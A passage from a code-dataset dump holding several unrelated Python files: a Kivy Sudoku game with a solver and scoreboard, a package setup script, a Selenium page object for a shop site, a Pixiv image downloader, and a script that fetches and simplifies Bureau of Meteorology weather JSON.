range(i, 9):\n                for col in range(j, 9):\n                    if self.board[row][col] == 0:\n                        return row, col\n            for row in range(0, 9):\n                for col in range(0, 9):\n                    if self.board[row][col] == 0:\n                        return row, col\n            return -1, -1\n\n        def is_valid(i, j, e):\n            row_ok = all([e != self.board[i][x] for x in range(9)])\n            if row_ok:\n                col_ok = all([e != self.board[x][j] for x in range(9)])\n                if col_ok:\n                    # finding the top left x,y co-ordinates of the section containing the i,j cell\n                    sec_top_x, sec_top_y = 3 * (i // 3), 3 * (j // 3)  # floored quotient should be used here.\n                    for x in range(sec_top_x, sec_top_x + 3):\n                        for y in range(sec_top_y, sec_top_y + 3):\n                            if self.board[x][y] == e:\n                                return False\n                    return True\n            return False\n\n        def solve_sudoku(i=0, j=0):\n            i, j = find_next_empty(i, j)\n            if i == -1:\n                return True\n            for e in range(1, 10):\n                if is_valid(i, j, e):\n                    self.board[i][j] = e\n                    self.cells[i][j].text = str(e)\n                    if solve_sudoku(i, j):\n                        return True\n                    # Undo the current cell for backtracking\n                    self.board[i][j] = 0\n            return False\n\n        return solve_sudoku()\n\n    def clear_board(self):\n        for cell in self.grid.children:\n            row = cell.row\n            col = cell.col\n            if not cell.generated:\n                cell.text = ''\n                self.board[row][col] = 0\n\n    def reset(self):\n        self.clear_board()\n        self.seconds = 0\n        self.timer.text = seconds2str(self.seconds)\n        self.start_timer()\n\n    def update_grid(self):\n        for cell in self.grid.children:\n            value = self.board[cell.row][cell.col]\n            if value != 0:\n                cell.text = str(value)\n            else:\n                cell.text = ''\n\n    def cheat(self):\n        if self.game_started:\n            self.clear_board()\n            self.clockEvent.cancel()\n            success = self.solve()\n            self.update_grid()\n            if success:\n                self.win()\n\n    def check_board(self):\n        for row in range(9):\n            row_nums = set()\n            for col in range(9):\n                num = self.board[row][col]\n                # is there an empty cell left?\n                if num == 0:\n                    return False\n                # is there a repeated digit in the row?\n                if num in row_nums:\n                    return False\n                row_nums.add(num)\n\n        for col in range(9):\n            col_nums = set()\n            for row in range(9):\n                num = self.board[row][col]\n                # is there a repeated digit in the column?\n                if num in col_nums:\n                    return False\n                col_nums.add(num)\n\n        for block_row in range(3):\n            for block_col in range(3):\n                square_nums = set()\n                for row in range(3):\n                    for col in range(3):\n                        num = self.board[3 * block_row + row][3 * block_col + col]\n                        # is there a repeated digit in the 3x3 block?\n                        # (the old square * row indexing ran past the board and missed blocks)\n                        if num in square_nums:\n                            return False\n                        square_nums.add(num)\n        return True\n\n    def win(self):\n        self.game_started = False\n        scoreboard = False\n\n        conn, cur = open_db()\n        count = cur.execute('SELECT count(*) FROM scores').fetchone()[0]\n\n        if count < 10:\n            scoreboard = True\n        else:\n            for row in cur.execute('SELECT date, name, seconds FROM scores ORDER BY seconds LIMIT 10'):\n                if self.seconds < row[2]:\n                    scoreboard = True\n                    break\n        conn.close()\n\n        if scoreboard:\n            popup = EnterNamePopup(self.seconds)\n            popup.open()\n\n    def create_cells(self):\n        self.grid.clear_widgets()\n        self.cells.clear()\n        for row in range(9):\n            self.cells.append([])\n            for col in range(9):\n                cell = SudokuCell(row, col, self)\n                if self.board[row][col] != 0:\n                    cell.text = str(self.board[row][col])\n                    cell.generated = True\n                else:\n                    cell.generated = False\n\n                cell.set_background()\n                self.grid.add_widget(cell)\n                self.cells[row].append(cell)\n        for cell in self.grid.children:\n            value = self.board[cell.row][cell.col]\n            if value != 0:\n                cell.text = str(value)\n                cell.generated = True\n            else:\n                cell.text = ''\n                cell.generated = False\n            cell.set_background()\n\n    def select(self, row, col):\n        for cell in self.grid.children:\n            if isinstance(cell, SudokuCell):\n                
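# --- editor's note (sketch) ---
# Sanity check for the corrected 3x3 block scan in check_board() above: the
# (block_row, block_col) x (row, col) loops stay in range and visit every
# cell of the 9x9 board exactly once.
cells = {(3 * br + r, 3 * bc + c)
         for br in range(3) for bc in range(3)
         for r in range(3) for c in range(3)}
assert len(cells) == 81 and max(max(p) for p in cells) == 8
# --- end note ---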
cell.set_background()\n self.selection = (row, col)\n\n @staticmethod\n def back():\n sm.current = 'Menu'\n\n\nclass SudokuCell(Button):\n def __init__(self, row, col, screen, generated=False, **kwargs):\n super(SudokuCell, self).__init__(**kwargs)\n self.row = row\n self.col = col\n self.screen = screen\n self.generated = generated\n self.background_normal = \"white.png\"\n self.background_down = \"white.png\"\n self.color = cell_color_default\n self.set_background()\n\n def set_background(self):\n if self.generated:\n self.background_color = cell_background_generated\n else:\n upper_left = (self.row < 3 and self.col < 3)\n upper_right = (self.row < 3 and self.col > 5)\n middle = (3 <= self.row <= 5 and 3 <= self.col <= 5)\n lower_left = (self.row > 5 and self.col < 3)\n lower_right = (self.row > 5 and self.col > 5)\n if upper_left or upper_right or middle or lower_left or lower_right:\n self.background_color = cell_background_accent\n else:\n self.background_color = cell_background_default\n\n def select(self):\n if self.generated:\n return False\n self.screen.select(self.row, self.col)\n self.background_color = cell_background_selected\n return True\n\n\nclass RulesScreen(Screen):\n def __init__(self, **kwargs):\n super(RulesScreen, self).__init__(**kwargs)\n\n @staticmethod\n def back():\n sm.current = 'Menu'\n\n\nclass ScoreboardScreen(Screen):\n def __init__(self, **kwargs):\n super(ScoreboardScreen, self).__init__(**kwargs)\n\n def create_list(self):\n self.scoreList.clear_widgets()\n conn, cur = open_db()\n\n count = 0\n for row in cur.execute('SELECT date, name, seconds FROM scores ORDER BY seconds LIMIT 10'):\n count += 1\n row_layout = BoxLayout()\n\n label1 = Label(text=f'{count}.')\n label1.color = (0, 0, 0, 1)\n label1.font_size = 20\n row_layout.add_widget(label1)\n\n label2 = Label(text=str(row[1]))\n label2.color = (0, 0, 0, 1)\n label2.font_size = 20\n row_layout.add_widget(label2)\n\n label3 = Label(text=seconds2str(row[2]))\n label3.color = (0, 0, 0, 1)\n label3.font_size = 20\n row_layout.add_widget(label3)\n\n label4 = Label(text=str(row[0]).split('.')[0])\n label4.color = (0, 0, 0, 1)\n label4.font_size = 20\n row_layout.add_widget(label4)\n\n self.scoreList.add_widget(row_layout)\n\n conn.close()\n\n @staticmethod\n def back():\n sm.current = 'Menu'\n\n\nclass EnterNamePopup(Popup):\n def __init__(self, seconds, **kwargs):\n super(EnterNamePopup, self).__init__(**kwargs)\n self.title = 'Felkerültél a pontlistára!'\n self.auto_dismiss = False\n self.seconds = seconds\n\n def save_score(self):\n conn, cur = open_db()\n\n if self.player_name.text:\n name = self.player_name.text\n else:\n name = '-'\n\n record = (datetime.now(), name, self.seconds)\n cur.execute('INSERT INTO scores VALUES (?, ?, ?)', record)\n conn.commit()\n conn.close()\n self.dismiss()\n\n\nclass SudokuApp(App):\n def __init__(self, **kwargs):\n super(SudokuApp, self).__init__(**kwargs)\n\n def build(self):\n sm.transition = WipeTransition()\n\n menu_screen = MenuScreen(name='Menu')\n sm.add_widget(menu_screen)\n\n game_screen = GameScreen(name='Game')\n sm.add_widget(game_screen)\n\n rules_screen = RulesScreen(name='Rules')\n sm.add_widget(rules_screen)\n\n scoreboard_screen = ScoreboardScreen(name='Scoreboard')\n sm.add_widget(scoreboard_screen)\n\n sm.current = 'Menu'\n return sm\n\n\nif __name__ == '__main__':\n 
SudokuApp().run()\n","repo_name":"arvaid/eke-progkorny-bead1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21727322231","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"demand-manager\",  # Replace with your own username\n    version=\"0.0.2\",\n    author=\"Shan Dora He\",\n    author_email=\"dora.shan.he@gmail.com\",\n    description=\"Demand manager optimally schedules loads (e.g. appliances, batteries and EVs) \"\n                \"of single or multiple households to minimise the peak demand, \"\n                \"energy usage cost (and network charge if any) and discomfort \"\n                \"using MiniZinc and solvers (e.g. COIN-BC, Gurobi and CPLEX). \",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/dorahee/demand-manager.git\",\n    packages=setuptools.find_packages(include=['demand-manager', 'demand-manager.*']),\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n        \"Operating System :: OS Independent\",\n    ],\n    python_requires='>=3.6',\n)","repo_name":"dorahee/demand-manager","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21450271066","text":"from selenium.webdriver.common.by import By\n\nfrom src.POM.Pages.basePage import BasePage\n\n\nclass DashboardPage(BasePage):\n\n    def __init__(self, driver):\n        self.driver = driver\n\n    inventoryList = By.XPATH, \"//div[@class='inventory_item']\"\n    inventoryPageSideMenu = By.XPATH, \"//div[@class='bm-burger-button']/button\"\n    addToCartButton = \"//div[contains(text(), '{productName}')]/ancestor::div[@class='inventory_item_description']/div/button\"\n    removeFromCartButton = \"//div[contains(text(), '{productName}')]/ancestor::div[@class='inventory_item_description']/div/button\"\n    cartCount = By.XPATH, \"//div/a/span\"\n    filterDropDown = By.XPATH, \"//span[@class='select_container']\"\n    filterDropDownValue = \"//select/option[contains(text(),'{filName}')]\"\n    selectedFilter = \"//span[contains(text(),'{selectedFilterName}')]\"\n    elementsName = \"(//div/a/div)\"\n    elementsPrize = \"(//div[@class='pricebar']/div)\"\n    cartLink = By.XPATH, \"//a[@class='shopping_cart_link']\"\n    productDescription = \"//div[contains(text(), '{productName}')]/ancestor::div[@class='inventory_item_label']/div\"\n\n    def countOfItems(self, eleCount):\n        count = self.get_count(self.inventoryList)\n        assert eleCount in str(count)\n\n    def addProductToCart(self, product):\n        productToAdd = By.XPATH, self.addToCartButton.format(productName=product)\n        self.do_click(productToAdd)\n\n    def verifyProductAddToCart(self, noOfProducts):\n        cartCount = self.get_element_text(self.cartCount)\n        # compare the cart badge against the expected count (the original asserted cartCount in cartCount, which is always true)\n        assert str(noOfProducts) in cartCount\n\n    def selectFilterDropDownValue(self, filterName):\n        filterToSelect = By.XPATH, self.filterDropDownValue.format(filName=filterName)\n        self.do_click(self.filterDropDown)\n        self.do_click(filterToSelect)\n        selectedFilter = By.XPATH, self.selectedFilter.format(selectedFilterName=filterName)\n        isFilterSelected = self.is_visible(selectedFilter)\n        assert isFilterSelected\n\n    def removeProductFromCart(self, product):\n        productToRemove = By.XPATH, 
self.addToCartButton.format(productName=product)\n self.do_click(productToRemove)\n\n def verifySortedListAtoZ(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsName))\n sortedElementList = sorted(allElementsName)\n assert allElementsName == sortedElementList\n\n def verifySortedListZtoA(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsName))\n sortedElementList = sorted(allElementsName, reverse=True)\n assert allElementsName == sortedElementList\n\n def verifySortedListPrizeLowToHigh(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsPrize))\n elementListOriginal = []\n for item in allElementsName:\n elementListOriginal.append(item.replace(\"$\", ''))\n sortedElementList = sorted(elementListOriginal, key=lambda x: float(x))\n assert sortedElementList == elementListOriginal\n\n def verifySortedListPrizeHighToLow(self):\n allElementsName = self.get_elements_list((By.XPATH, self.elementsPrize))\n elementListOriginal = []\n for item in allElementsName:\n elementListOriginal.append(item.replace(\"$\", ''))\n sortedElementList = sorted(elementListOriginal, key=lambda x: float(x), reverse=True)\n assert sortedElementList == elementListOriginal\n\n def navigateToCartPage(self):\n self.do_click(self.cartLink)\n\n def getProductDescription(self, product):\n productDescription = By.XPATH, self.productDescription.format(productName=product)\n productDescriptionText = self.get_element_text(productDescription)\n return productDescriptionText\n","repo_name":"SachinKumar1606/SeleniumPythonPOM","sub_path":"src/POM/Pages/dashboardPage.py","file_name":"dashboardPage.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37651950074","text":"import os\nimport aiohttp\nimport asyncio\nfrom sys import stderr\nfrom time import sleep\nfrom threading import Thread\nfrom loguru import logger\n\nimport requests\nfrom sqlalchemy import and_\nfrom pixivpy3 import AppPixivAPI as SyncApi\nfrom pixivpy3.utils import JsonDict\nfrom pixivpy_async import PixivClient, AppPixivAPI\nfrom aiohttp.client_exceptions import ServerDisconnectedError\n\nimport config\nfrom config import REFRESH_TOKEN\nfrom src.database import session_maker, Art\n\n\ndef download_disconnect_handle(function):\n async def inner(session, url, file_name):\n try:\n await function(session, url, file_name)\n except ServerDisconnectedError:\n logger.error(f'Server closed connection with {url}, download failed\\n')\n return inner\n\n\n@download_disconnect_handle\nasync def download_data(session, url, file_name):\n logger.info(f'Downloading file {url}')\n sleep(0.1)\n async with session.get(url, headers={'Referer': 'https://app-api.pixiv.net/'}) as response:\n data = await response.read()\n with session_maker() as session:\n art_id = url.split('/')[-1].split('.')[0]\n if 'ugoira' in art_id:\n logger.info(f'Download failed {url}')\n return\n try:\n art_id, art_num = int(art_id.split('_p')[0]) if '_p' in art_id else int(art_id), 0\n except Exception as e:\n logger.error(f'Something went wrong {e}')\n return\n if session.query(Art).filter(Art.url == url).first():\n logger.info(f'Art already exists {url}')\n return\n art = Art(\n pixiv_id=art_id,\n art_num=art_num,\n url=url,\n posted=True\n )\n\n try:\n session.add(art)\n session.commit()\n except:\n return\n path = f'{config.appdata}\\\\{config.app_name}\\\\{file_name}'\n with open(path, 'wb') as image_file:\n image_file.write(data)\n 
image_file.close()\n logger.info(f'Success downloaded {url}')\n\n\n# modification for for search with bookmarks filter\nasync def search_illust_mod(\n app_api_,\n word: str,\n search_target: str = 'partial_match_for_tags',\n sort: str = 'date_desc',\n duration: str = None,\n filter: str = 'for_ios',\n offset: int = None,\n req_auth: bool = True,\n start_date=None,\n end_date=None,\n bookmark_num_min=None,\n bookmark_num_max=None\n):\n method, url = app_api_.api.search_illust\n if bookmark_num_min is not None:\n params = app_api_.set_params(\n word=word,\n search_target=search_target,\n sort=sort,\n filter=filter,\n duration=duration,\n offset=offset,\n start_date=start_date,\n end_date=end_date,\n bookmark_num_min=bookmark_num_min,\n bookmark_num_max=bookmark_num_max,\n )\n else:\n params = app_api_.set_params(\n word=word,\n search_target=search_target,\n sort=sort,\n filter=filter,\n duration=duration,\n offset=offset,\n start_date=start_date,\n end_date=end_date,\n )\n return await app_api_.requests_(method=method, url=url, params=params, auth=req_auth)\n\n\ndef make_dir(dir_name):\n path = f'images/{dir_name}/'\n if not os.path.exists(path):\n os.mkdir(path)\n\n return path\n\n\nasync def make_arts_pack(data):\n arts_pack = []\n if not data.get('illusts'):\n return arts_pack\n for illust_data in data['illusts']:\n if illust_data['meta_single_page']:\n arts_pack.append(illust_data['meta_single_page']['original_image_url'])\n elif illust_data['meta_pages']:\n for art_urls in illust_data['meta_pages']:\n arts_pack.append(art_urls['image_urls']['original'])\n return arts_pack\n\n\nasync def download_arts_by_tag(tag, pack_num, min_bookmark=0, max_bookmark=0):\n async with PixivClient() as client:\n api = AppPixivAPI(client=client)\n await api.login(refresh_token=REFRESH_TOKEN)\n next_pack = {\n \"word\": tag,\n \"search_target\": \"partial_match_for_tags\",\n \"sort\": \"date_desc\",\n \"filter\": \"for_ios\",\n \"bookmark_num_min\": min_bookmark,\n \"bookmark_num_max\": max_bookmark,\n \"offset\": 0\n }\n download_queue = []\n while int(pack_num) > len(download_queue):\n if next_pack == {}:\n break\n data = await search_illust_mod(api, **next_pack)\n arts_pack = await make_arts_pack(data)\n for art_url in arts_pack:\n if len(download_queue) >= int(pack_num):\n break\n with session_maker() as session:\n if not session.query(Art).filter(Art.url == art_url).first():\n download_queue.append(art_url)\n\n next_pack = api.parse_qs(data.next_url) if api.parse_qs(data.next_url) else {}\n\n async with aiohttp.ClientSession() as session:\n tasks = list()\n for art in download_queue:\n tasks.append(asyncio.create_task(download_data(session=session, url=art, file_name=art.split('/')[-1])))\n await asyncio.gather(*tasks)\n\n\n# --------------------------------------------\n\n\ndef following_demon() -> None:\n logger.info('following_demon started')\n api = SyncApi()\n api.auth(refresh_token=REFRESH_TOKEN)\n next_users_pack = {\n 'restrict': 'public',\n 'user_id': config.USER_ID,\n 'offset': 0\n }\n while next_users_pack:\n user_following_json = api.user_following(**next_users_pack)\n if not user_following_json.user_previews:\n next_users_pack = None\n break\n users_handler(api, user_following_json)\n next_users_pack = api.parse_qs(user_following_json.next_url)\n sleep(config.request_delay)\n print(next_users_pack['offset'])\n logger.info('following_demon end')\n\n\ndef users_handler(api: SyncApi, users: JsonDict) -> None:\n for user_data in users.user_previews:\n next_arts_pack = {\n 'user_id': 
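# --- editor's note (hypothetical usage) ---
# download_arts_by_tag() above is a coroutine; assuming REFRESH_TOKEN and the
# database are configured, a minimal driver would be:
#
#     import asyncio
#     asyncio.run(download_arts_by_tag("landscape", pack_num=10,
#                                      min_bookmark=500, max_bookmark=0))
#
# (the tag and counts here are illustrative values only)
# --- end note ---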
user_data.user.id,\n 'filter': 'for_ios',\n 'type': 'illust',\n 'offset': 0\n }\n while next_arts_pack:\n response = api.user_illusts(**next_arts_pack)\n if not response.illusts:\n next_arts_pack = None\n break\n for art_data in response.illusts:\n save_art_url(art_data)\n next_arts_pack = api.parse_qs(response.next_url)\n sleep(config.request_delay)\n\n\ndef save_art_url(art_data: JsonDict) -> None:\n try:\n if art_data.meta_pages:\n if art_data.type != 'illust':\n return\n for meta_page in art_data.meta_pages:\n with session_maker() as session:\n art_id = meta_page.image_urls.original.split('/')[-1].split('.')[0]\n try:\n art_id, art_num = int(art_id.split('_p')[0]) if '_p' in art_id else int(art_id), 0\n except Exception as e:\n logger.error(f'Something went wrong {e}')\n continue\n if session.query(Art).filter(Art.url == meta_page.image_urls.original).first():\n continue\n art = Art(\n pixiv_id=art_id,\n art_num=art_num,\n url=meta_page.image_urls.original,\n posted=False,\n author_id=art_data.user.id\n )\n session.add(art)\n session.commit()\n session.close()\n\n elif art_data.meta_single_page:\n with session_maker() as session:\n if not art_data.meta_single_page.original_image_url or art_data.type != 'illust':\n return\n art_id = art_data.meta_single_page.original_image_url.split('/')[-1].split('.')[0]\n try:\n art_id, art_num = int(art_id.split('_p')[0]) if '_p' in art_id else int(art_id), 0\n except Exception as e:\n logger.error(f'Something went wrong {e}')\n return\n if session.query(Art).filter(Art.url == art_data.meta_single_page.original_image_url).first():\n return\n\n art = Art(\n pixiv_id=art_id,\n art_num=art_num,\n url=art_data.meta_single_page.original_image_url,\n posted=False,\n author_id=art_data.user.id\n )\n session.add(art)\n session.commit()\n del art\n session.close()\n except Exception:\n logger.info(art_data)\n raise\n\n\ndef download_following(pack_size: int) -> None:\n with session_maker() as session:\n arts = session.query(Art).filter(Art.posted!=True).order_by(Art.pixiv_id.desc()).limit(pack_size).all()\n queue = [Thread(target=download_file, args=(art.url, )) for art in arts]\n for thread in queue:\n sleep(2)\n thread.start()\n for thread in queue:\n thread.join()\n\n\ndef download_file(url: str) -> None:\n with session_maker() as session:\n logger.info(f'Downloading file {url}')\n response = requests.get(url, headers={'Referer': 'https://app-api.pixiv.net/'})\n session.query(Art).filter(Art.url == url).update({'posted': True})\n session.commit()\n path = f'{config.appdata}\\\\{config.app_name}\\\\{url.split(\"/\")[-1]}'\n with open(path, 'wb') as image_file:\n image_file.write(response.content)\n logger.info(f'Success downloaded {url}')\n","repo_name":"rokv1l/arts_poster","sub_path":"app/core/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":10063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36904425972","text":"#!/usr/bin/env python3\n# ~*~ encoding: utf-8 ~*~\n\n\n#========\n# name: ws.py\n# date: 2018NOV13\n# prog: pr\n# desc: grab your local BOM data & save to file, simplify data if needed\n# save as json to new (web) directory for use.\n# \n# WSD ☀️🌤️🌦️🌧️\n#\n# 2018NOV13\n# create option to reverse data order to compensate for data that \n# is ordered. this is important, especially if in the case of \n# weather data that is date ordered. Only available if you \n# extract and simplify. 
Usage below.\n#\n# ./ws.py -e -s -b\n# \n# the option is only available using -e and -s\n#\n#\n# 2018NOV06\n# add rain_trace to data processing. allows weather.js to rain\n# information \n# \n# 2018NOV02\n# fix this crap:\n#\n# TODO initialisation of these fields is dodgy, verify\n# add these fields to the header so we don't have problem of \n# undefined. But we have to work with this on d3js side\n#\n# reformat that local time to an ISO format so we can convert to Date in JS side \n# the objective here is to create a datetime ISO standard, then at JS\n# side you can create a date and manipulate it.\n#\n# local_date_time_full local_date_time_iso\n# ie: \"20181102083000\" ==> \"2018-11-02T08:30:00\"\n# \n# Note the key change: local_date_time_full to local_date_time_iso\n# this needs to be used JS side.\n#\n# doing this allows great flexibility at the d3js side where you can \n# manipulate dates and times at high granular level for graphing.\n#\n#\n# 2018NOV01\n# Dates in JavaScript suck bad!\n# \n# So I'm left with pre-processing the dates and while I'm at it, \n# reduce the number of fields (suppress) so the data is ONLY what\n# I need. At the moment this is:\n#\n# * date in local time\n# * temperature\n#\n# need to add a blank set of keys and blank values to avoid 'undefined'\n# when reading first record. is there a better way to do this? add a \n# header? that's what got me in the first place. \n# \n# 2018OCT31\n# for extracted weather data: minor update to make unique filename\n# with date optional & replace with default until directed. \n# Makes it easier to have the same filename when calling from D3 code.\n#\n#\n# 2018OCT30: \n# A lost day. bugger: the file is so complex I'm having problems \n# parsing the data in d3. one solution is to extract what I need \n# from this file, write to another less complex file:\n#\n# filename: yyyymmmdd.json\n# \n# header.refresh_message as description\n# header.name as location\n# header.ID/header.mainID as id\n# header.main_ID as mid\n# \n# data.array: array of data files from existing file\n#\n# source file: \n# melbourne airport \n# \n#\n# data file: \n# melbourne airport \n# \n# \n# usage: \n# create JSON data file\n# ./ws.py -n -t 'melbourne airport' -f \"json\" -u http://www.bom.gov.au/fwo/IDV60801/IDV60801.94866.json\n# GET\n# ./ws.py -g\n#\n#\n# EXTRACT\n# ./ws.py -e \n# rename\n# ./ws.py -e -r\n# SIMPLIFY\n# ./ws.py -e -s \n# backwards\n# ./ws.py -e -s -b\n#\n# debug\n# ./ws.py -d\n# help\n# ./ws.py -h\n# uses:\n# python requests library\n#========\n\n\n__url__ = \"https://github.com/peterrenshaw/wsd\"\n__email__ = \"peterrenshaw@seldomlogical.com\"\n__author__=\"Peter RENSHAW\"\n__license__=\"GNU GPL 3.0\"\n__version__=\"0.2.5\"\n__description__=\"\"\"grab your local BOM data & save to file, simplify data if needed save as json to new (web) directory for use\"\"\"\n\n\nimport os\nimport sys\nimport json\nimport time\nimport datetime\nfrom optparse import OptionParser\n\n\nimport requests # pip3 import requests\nfrom requests import get\n\n\nfrom config import PROG_NAME\nfrom config import BASE_PATH\nfrom config import CONF_DATA_FILE\nfrom config import WEATHER_DATA_ALL_FN\nfrom config import WEATHER_DATA_SIMPLE_FN\nfrom config import WEATHER_DATA_SIMPLE_HEAD_FN\n\n\n#--------- keep here ---------\nVERSION = __version__\nCODE_PATH = os.path.join(BASE_PATH, \"py/wsd\")\nDEST_PATH = os.path.join(BASE_PATH, \"d3\") #TODO: optional save to argument directory\nCDFPN = os.path.join(CODE_PATH, CONF_DATA_FILE)\nWDFPN = os.path.join(DEST_PATH, 
WEATHER_DATA_ALL_FN)\n#--------- keep here ---------\n\n\n#--------\n# get_config: load config data given filepath, \n# return format, filename and url to extract\n# \n# WARNING: convenience methods call this\n# function. if you want more than a\n# bit of config use this method.\n# \n# * want all the config info? use this method. \n# * want only URL? use get_config_url\n# \n#--------\ndef get_config(filepathname=CDFPN, debug=False):\n    \"\"\"\n    load configuration data given filepath\n    then retrieve url.\n    \"\"\"\n    # convert from JSON\n    with open(filepathname, 'r') as f:\n        data = json.load(f)\n        f.close()\n    \n    if debug:\n        print(\"load data...\")\n        print(\"key:\\tvalue\")\n        print(\"--- \\t------------\")\n        for key in data.keys():\n            print(\"{}:\\t{}\".format(key, data[key]))\n\n    # lets download resource file\n    url = data['url']\n    title = data['title']\n    data_format = data['format']\n    \n    return {'url': url, 'title': title, 'format': data_format}\ndef get_config_url(fpn=CDFPN, debug=False):\n    \"\"\"convenience method for get_config\"\"\"\n    url = get_config(fpn, debug)['url']\n    return url \n\n\n#======\n# main: cli entry point\n#======\ndef main():\n    usage = \"usage %prog -u -t\"\n    parser = OptionParser(usage)\n    parser.add_option(\"-d\", \"--debug\", dest=\"debug\", action=\"store_true\", help=\"show debug messages\")\n    parser.add_option(\"-n\", \"--new\", dest=\"new\", action='store_true', help=\"create new config file\", )\n    parser.add_option(\"-u\", \"--url\", dest=\"url\", help=\"url of weather data\")\n    parser.add_option(\"-f\", \"--format\", dest=\"format\", help=\"url data format\")\n    parser.add_option(\"-t\", \"--title\", dest=\"title\", help=\"name of weather location\")\n    parser.add_option(\"-g\", \"--get\", dest=\"get\", action=\"store_true\", help=\"get latest data\")\n    parser.add_option(\"-e\", \"--extract\", dest=\"extract\", action=\"store_true\", help=\"extract the good bits\")\n    parser.add_option(\"-s\", \"--simplify\", dest=\"simplify\", action=\"store_true\", help=\"simplify extraction, remove unwanted data fields\")\n    parser.add_option(\"-r\", \"--rename\", dest=\"rename\", action=\"store_true\", help=\"rename the extracted file to ^yyymmmddThh^ format\")\n    parser.add_option(\"-b\", \"--backwards\", dest=\"backwards\", action=\"store_true\", help=\"reverse option for data collected, reverse the data order\")\n    options, args = parser.parse_args()\n\n\n    if options.debug:\n        print(\"{} v{}.\".format(PROG_NAME, VERSION))\n        print(\"debug on\")\n        print(\"filepath config: <{}>\".format(CDFPN))\n        print(\"filepath latest: <{}>\".format(WDFPN))\n\n    # get the latest data\n    if options.get:\n\n        # read configuration\n        if os.path.isfile(CDFPN):\n\n            # get weather data url...\n            url = get_config_url(debug=options.debug)\n\n            # request a copy of the url file, \n            # save to file so we can use it.\n            with open(WDFPN, \"wb\") as f:\n                response = get(url)\n                f.write(response.content)\n                f.close()\n\n            if options.debug:\n                print(\"saved:\\t<{}>\".format(WDFPN))\n        else:\n            sys.stderr.write(\"Error: No configuration file, please create a new configuration data file.\")\n\n    # build a new configuration file\n    elif options.new:\n        \n        # given URL and TITLE\n        if not options.url:\n            sys.stderr.write(\"Error: Please supply a valid URL for weather location data.\")\n        if not options.title:\n            sys.stderr.write(\"Error: Please supply a name or descriptive title for weather location.\")\n        if not options.format:\n            sys.stderr.write(\"Error: Please supply a format for the weather location data.\")\n\n        # build and save data to file as JSON\n        
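# --- editor's note (illustration) ---
# The -n branch below serialises exactly three keys; using the values from the
# usage example in this file's header, the written config would look like:
#
#     {
#         "format": "json",
#         "title": "melbourne airport",
#         "url": "http://www.bom.gov.au/fwo/IDV60801/IDV60801.94866.json"
#     }
# --- end note ---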
data = {}\n data['title'] = options.title\n data['url'] = options.url\n data['format'] = options.format\n\n if options.debug:\n print(\"create configuration\")\n print(\"<{}>\".format(data))\n \n # convert to JSON, save config\n with open(CDFPN, 'w') as f:\n json.dump(data, f, \n ensure_ascii=False,\n indent=4,\n sort_keys=True)\n f.close()\n sys.exit(0)\n\n elif options.extract:\n if os.path.isfile(WDFPN):\n if options.debug:\n print(\"extract from <{}>\".format(WDFPN))\n\n # read, load as JSON\n data = None\n with open(WDFPN) as f:\n data = f.read()\n f.close()\n \n \n # convert data from json format \n # to PY data structures to allow \n # easy manipulation\n pyd = json.loads(data)\n\n\n #--------\n # extract good bits:\n # this is hard-coded for the BOM weather data\n # formats. \n # \n # WARNING: if things break, it will be here but will not be likely. \n # \n observations = pyd['observations']\n data = observations['data']\n header = observations['header']\n #--------\n\n\n #-------\n # data extraction:\n # placeholder for data extraction.\n # if options.simplify is chosen\n # look at keys in 'key_simple' and\n # extract and add to data list\n # else\n # extract all the data\n #-------\n kvd = []\n h = []\n if options.simplify:\n d = []\n ds = {}\n ds_line = {'apparent_t': 0,\n 'local_date_time_iso': '',\n 'gust_kmh': 0,\n 'rel_hum': 0,\n 'rain_trace': 0,\n 'sort_order': 0}\n\n # look thru data, extract keys using key_simple \n # process, local_date_time_full\n #\n # \"20181102083000\" ==> \"2018-11-02T08:30:00\"\n #\n # reformat that local time to a ISO format \n # so we can convert to Date in JS side \n title = \"latest\"\n name = header[0]['name']\n timezone = header[0]['state_time_zone']\n location = \"{} / {}\".format(name, timezone)\n\n message = header[0]['refresh_message']\n product = \"{}.{}\".format(header[0]['main_ID'], header[0]['ID'])\n\n #h.append(title.upper())\n h.append(location.upper())\n h.append(message.capitalize())\n #h.append(product.lower())\n\n # gather the data\n for item in data:\n for key in item.keys():\n \n if key in ds_line:\n ds[key] = item[key]\n if key == 'local_date_time_full':\n dt = datetime.datetime(*time.strptime(item['local_date_time_full'], \"%Y%m%d%H%M%S\")[0:5])\n ds['local_date_time_iso'] = dt.isoformat()\n \n d.append(ds)\n ds = {}\n kvd = d\n else:\n kvd = data \n\n\n #--------\n # organise data:\n # I want a simple list with a simple header and line items of\n # data. A simple array in JS, header info at first line, rest\n # of the data follows. Easy peasy. \n data = []\n for item in kvd: # if simple, reduced values otherwise alldata \n data.append(item) # lots of data items follow\n d = data\n #--------\n\n \n #--------\n # does the data need to be reversed?\n # this option grabs the list and \n # reverses the order so it is backwards.\n if options.backwards:\n d.reverse()\n if options.debug:\n print(\"{}\\n{}\\n{}\".format(len(d), d[0], d[len(d)-1]))\n\n\n #--------\n # build file name:\n # SPECIFIC (-r, rename option. takes no options formats as yyyymmmddThh\n # I want a filename that is unique to the hour. 
